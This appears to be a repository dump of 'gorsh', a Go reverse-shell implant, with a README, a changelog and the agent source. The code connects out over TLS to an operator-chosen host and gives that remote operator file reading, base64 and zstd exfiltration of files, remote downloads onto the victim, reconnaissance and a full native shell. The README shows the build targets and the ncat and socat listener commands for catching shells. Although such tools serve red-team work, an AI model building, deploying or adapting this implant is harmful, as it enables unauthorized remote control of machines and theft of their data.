README.md
# gorsh

[go]lang [r]everse [sh]ell

[![forthebadge](https://forthebadge.com/images/badges/fuck-it-ship-it.svg)](https://forthebadge.com)
[![forthebadge](https://forthebadge.com/images/badges/made-with-go.svg)](https://forthebadge.com)
[![forthebadge](https://forthebadge.com/images/badges/no-ragrets.svg)](https://forthebadge.com)
[![forthebadge](https://forthebadge.com/images/badges/contains-technical-debt.svg)](https://forthebadge.com)
[![forthebadge](https://forthebadge.com/images/badges/made-with-crayons.svg)](https://forthebadge.com)

![](https://i.imgur.com/x51XH6K.png)
[![asciicast](https://asciinema.org/a/NmeC42TNu8BgdjMLcyVUXo74x.svg)](https://asciinema.org/a/NmeC42TNu8BgdjMLcyVUXo74x)

Originally forked from - [sysdream/hershell](https://github.com/sysdream/hershell)

## Fork Changes

**Requires go1.16+**

See the [Changelog](./docs/CHANGELOG.md)

## Getting started

```bash
git clone git@github.com:audibleblink/gorsh.git
```

Using the zstd build tag and windll make target require cgo.
Make sure you're familiar with cross-compilation and cgo and have the toolchains for it, or read
[here](./docs/TROUBLESHOOTING.md) if you're feeling adventurous.

### Usage

**Create** `internal/sshocks/conf/ssh.json`. There's an example in that same directory for
reference.

Follow the make command's printed instructions on creating an ssh user for the reverse proxy
connection.

Generate agents with:

```bash
# For the `make` targets, you only need the`LHOST`and`LPORT`environment variables.
$ make {windows,macos,linux} LHOST=example.com LPORT=443
```

#### Enumeration Scripts

The `enum` command will present a selection dialog that allows once to run enumeration scripts based
on the host OS. You can update scripts in `scripts/prepare_enum_scripts.sh` and run 
`make enumscripts`. Addition of scripts will require modification of
`./internal/enum/enum_{windows,linux}.go`


#### Catching the shell

This project ships with a server that catches the reverse shell and still provides shell-like
capabilities you lose with traditional reverse shells, including:

* Tab Completion
* Vi-mode readline editing
* History
* Cursor movements

Generate the server with:

```sh
make server
build/srv/gorsh-server --help
```

The gorsh and gorsh-server have a one-to-one relationship, like a traditional shell. For multiple
shells, you need to start multiple servers on different ports. Unless...

To have the ability to receive multiple shells on the same port, there's the `make listen` target.
The `make listen` target kicks off a socat TLS pipe and creates new tmux windows with each new
incoming connection.  Feed it a port number as PORT. 
`socat` is essentially acting as a TLS-terminating reverse proxy. The incoming connections are then
handed off to gorsh-server through randomly generated Unix Domain Sockets.

```sh
make listen PORT=8080

# once a client connects, on a different terminal type:
tmux attach -t GORSH
```

Shells can also be caught without tmux or gorsh-server using:

* socat (not working on macos)
* ncat
* openssl server module
* metasploit multi handler (with a `python/shell_reverse_tcp_ssl` payload)

__Examples__

```bash
$ ncat --ssl --ssl-cert server.pem --ssl-key server.key -lvp 1234
$ socat stdio OPENSSL-LISTEN:443,cert=server.pem,key=server.key,verify=0
```

## Credits

* Initial Work - [@lesnuages](https://github.com/lesnuages)
* Modifications - f47h3r - [@f47h3r_b0](https://twitter.com/f47h3r_b0)
* [@mzpqnxow](https://github.com/mzpqnxow) for figuring out my x-compilation and dependancy problems and troubleshooting guide
* Enumeration scripts courtesy of [@411hall](https://twitter.com/411hall) [@harmj0y](https://twitter.com/harmj0y) [@rebootuser](https://twitter.com/rebootuser)


docs/CHANGELOG.md
Changes after fork:

[01 Jul 21]
* extract connection logic to `core` module
* holeysocks case change and update 
* semantic use of make targets and dependencies
* adds shellcode target and dllmain code to Makefile
* improve handling of cgo when opting in to zstd
* replace vsfgen with native go embed (go1.16+)

[18 Mar 19]
* adds enumeration module with OS-specific scripts
    - Linux: LinEnum by @rebootuser
    - Windows: PowerUp, JAWS, Sherlock

[15 Mar 19]

* `spawn` command creates a new shell for redundancy
* `spawn host:port` creats a new shell to different hosts
* agent re-writen to use ishell for easier command additions and tab-completion
* addition of tty-capable lister that provides emacs movements and other readline capabilities
* vi-mode cli editing
* tab-completion
* reworks the tmux workflow to use the new gorsh-listener
* use unix sockets to receive plaintext comms from agents when running behind a reverse proxy
* `env` command expanded to also set variables
* `cp` added
* converted `shell` to a non-interactive,  one-off code executor


[older]
* Added a reverse SOCKS5 proxy over ssh. Configure in `configs/ssh.json`
* Uses tmux as a pseudo-C2-like interface, creating a new window with each agent callback
* zipcat: zip > base64 > cat for data small/medium data exfil (zstd/x64 or gzip/x86)
* Remove the use of passing powershell/cmd commands at the main prompt
* Add common file operation commands that use go instead of powershell/cmd
* Download files to victim with HTTP on all platforms
* Download files to victim with SMB on windows agents
* Situational Awareness output on new shells
* Removed Meterpreter functionality
* Removed Shellcode execution


gorsh.go
package main

import (
	"bufio"
	"bytes"
	"crypto/sha256"
	"crypto/tls"
	"encoding/base64"
	"encoding/hex"
	"fmt"
	"io/ioutil"
	"net"
	"os"
	"os/exec"
	"os/user"
	"strings"

	"code.cloudfoundry.org/bytefmt"
	"github.com/audibleblink/gorsh/fetch"
	"github.com/audibleblink/gorsh/shell"
	"github.com/audibleblink/gorsh/sitrep"
	"github.com/valyala/gozstd"
)

const (
	ERR_COULD_NOT_DECODE = 1 << iota
	ERR_HOST_UNREACHABLE = iota
	ERR_BAD_FINGERPRINT  = iota
)

var (
	connectString string
	fingerPrint   string
)

// Base64 encoding function
func Encode(path string) (string, error) {
	buff, err := ioutil.ReadFile(path)
	if err != nil {
		return "", err
	}
	return base64.StdEncoding.EncodeToString(buff), err
}

// Helper method to send output to reverse shell handler
func Send(conn net.Conn, msg string) {
	conn.Write([]byte("\n"))
	conn.Write([]byte(msg))
	conn.Write([]byte("\n"))
}

// Directory listing
func ListDir(argv []string) (string, error) {
	var path string

	if len(argv) < 2 {
		path = "./"
	} else {
		path = argv[1]
	}

	files, err := ioutil.ReadDir(path)

	if err != nil {
		return "", err
	}

	details := ""

	for _, f := range files {
		perms := f.Mode().String()
		size := bytefmt.ByteSize(uint64(f.Size()))
		modTime := f.ModTime().String()[0:19]
		name := f.Name()
		details = details + perms + "\t" + modTime + "\t" + size + "\t" + name + "\n"
	}

	return details, err
}

// Takes a network connection as its arg so it can pass stdio to it
// Handles user input and dispatches commands to various functions
// TODO: Extract this and perhaps modularize to make adding functionality easier
func InteractiveShell(conn net.Conn) {
	var (
		exit    bool           = false
		name, _                = os.Hostname()
		prompt  string         = fmt.Sprintf("\n[%s]> ", name)
		scanner *bufio.Scanner = bufio.NewScanner(conn)
	)

	// Print basic recon data on first connect
	Send(conn, sitrep.All())
	conn.Write([]byte(prompt))

	for scanner.Scan() {
		command := scanner.Text()

		if len(command) > 1 {
			argv := strings.Split(command, " ")

			switch argv[0] {
			case "exit":
				exit = true

			case "shell":
				Send(conn, "Mind your OPSEC")
				RunShell(conn)

			case "ls":
				listing, err := ListDir(argv)
				if err != nil {
					Send(conn, err.Error())
				} else {
					Send(conn, listing)
				}

			case "ps":
				listing := sitrep.Processes()
				Send(conn, listing)

			case "cd":
				if len(argv) > 1 {
					os.Chdir(argv[1])
				} else {
					usr, _ := user.Current()
					os.Chdir(usr.HomeDir)
				}
				dir, _ := os.Getwd()
				Send(conn, "Directory: "+dir)

			case "pwd":
				dir, _ := os.Getwd()
				Send(conn, dir)

			case "cat":
				if len(argv) != 2 {
					Send(conn, "Usage: cat <file>")
				} else {

					buf, err := ioutil.ReadFile(argv[1])

					if err != nil {
						Send(conn, err.Error())
					} else {
						Send(conn, string(buf))
					}
				}

			case "base64":
				if len(argv) != 2 {
					Send(conn, "Usage: base64 <file>")
				} else {
					base64, err := Encode(argv[1])

					if err != nil {
						Send(conn, err.Error())
					} else {
						Send(conn, base64)
					}
				}

			case "fetch":
				if len(argv) != 3 {
					Send(conn, "Usage: fetch <URI> <dest file>. "+
						"UNC Paths allowed on Windows")
				} else {
					bytes, err := fetch.Get(argv[1], argv[2])

					if err != nil {
						Send(conn, err.Error())
					} else {
						msg := fmt.Sprintf("%d bytes copied to %s",
							bytes, argv[2])
						Send(conn, msg)
					}
				}

			case "sitrep":
				net := sitrep.All()
				Send(conn, net)

			case "zstd":
				if len(argv) != 2 {
					Send(conn, "Usage: zstd <file>")
				} else {
					buf, err := ioutil.ReadFile(argv[1])
					if err != nil {
						Send(conn, err.Error())
					} else {
						compressed := gozstd.CompressLevel(nil, buf, 15)
						data := base64.StdEncoding.EncodeToString(compressed)
						Send(conn, data)
					}
				}

			case "help":
				Send(conn, "Currently implemented commands: \n"+
					"cd [path]          -  Change the process' working directory\n"+
					"ls [path]          -  List the current working directory\n"+
					"pwd                -  Print the current working directory\n"+
					"ps                 -  Print process information\n"+
					"cat <file>         -  Print the contents of the given file\n"+
					"base64 <file>      -  Base64 encode the given file and print\n"+
					"fetch <URI> <file> -  Fetch stuff. http[s]:// or //share/folder (Windows only)\n"+
					"shell              -  Drops into a native shell. Mind your OPSEC\n"+
					"sitrep             -  Situation Awareness information\n"+
					"zstd <file>        -  Compress and base64 endode file and print\n"+
					"\n")
			default:
				Send(conn, "Command not implemented. Try 'help'")
			}

			if exit {
				break
			}

		}

		conn.Write([]byte(prompt))
	}
}

func RunShell(conn net.Conn) {
	var cmd *exec.Cmd = shell.GetShell()
	cmd.Stdout = conn
	cmd.Stderr = conn
	cmd.Stdin = conn
	cmd.Run()
}

func CheckKeyPin(conn *tls.Conn, fingerprint []byte) bool {
	valid := false
	connState := conn.ConnectionState()
	for _, peerCert := range connState.PeerCertificates {
		hash := sha256.Sum256(peerCert.Raw)
		if bytes.Compare(hash[0:], fingerprint) == 0 {
			valid = true
		}
	}
	return valid
}

// Creates the TLS connection before passing it to the InteractiveShell function
func Reverse(connectString string, fingerprint []byte) {
	var (
		conn *tls.Conn
		err  error
	)

	config := &tls.Config{InsecureSkipVerify: true}

	if conn, err = tls.Dial("tcp", connectString, config); err != nil {
		os.Exit(ERR_HOST_UNREACHABLE)
	}

	defer conn.Close()

	if ok := CheckKeyPin(conn, fingerprint); !ok {
		os.Exit(ERR_BAD_FINGERPRINT)
	}

	InteractiveShell(conn)
}

func main() {
	if connectString != "" && fingerPrint != "" {
		fprint := strings.Replace(fingerPrint, ":", "", -1)
		bytesFingerprint, err := hex.DecodeString(fprint)
		if err != nil {
			os.Exit(ERR_COULD_NOT_DECODE)
		}
		Reverse(connectString, bytesFingerprint)
	}
}
